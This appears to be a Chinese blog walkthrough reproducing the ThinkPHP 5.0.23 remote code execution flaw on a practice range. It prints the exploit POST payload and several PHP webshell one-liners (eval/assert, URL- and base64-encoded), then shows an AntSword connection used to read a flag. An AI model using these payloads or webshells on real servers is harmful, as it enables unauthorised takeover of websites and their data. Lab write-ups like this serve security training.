ThinkPHP5.0.23 远程代码执行漏洞

ThinkPHP5.0.23 远程代码执行漏洞

漏洞描述:


ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞影响:


ThinkPHP <= 5.0.24

环境复现:

靶场地址【安鸾渗透实战平台】地址

漏洞复现:

在kali中查询Thinkphp5.X相关漏洞,发现存在。

查看该漏洞文件。

 发现完整版thinlphp5.0.23版本的poc。

 由于是post传参,所以用burp抓包或者浏览器插件,插入刚才的poc

 得到运行后的结果。

 使用phpinfo函数验证_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

 发现返回结果。

 

 我们创建一个shell2.php文件并向文件中写入一句话脚本。

发现上传成功。

 访问脚本,发现报错,猜测是编码的问题。

 

尝试编码执行echo “%3c%3fphp+%40eval(%24_POST%5b123%5d)%3b%3f%3e” > shell2.php

 发现还是报错。

尝试使用base64编码写入并且使用assert代替eval

zzz<?php @assert($_POST['xss']);?>yyy

enp6PD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/Pnl5eQ==

 进行poc上传。

访问发现回显成功。

 蚁剑进行连接,这里采用chr或者base64。

 

 

 

 连接成功,成功进入到后台。

 在根目录下发现flag。

 查看flag。

 

  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值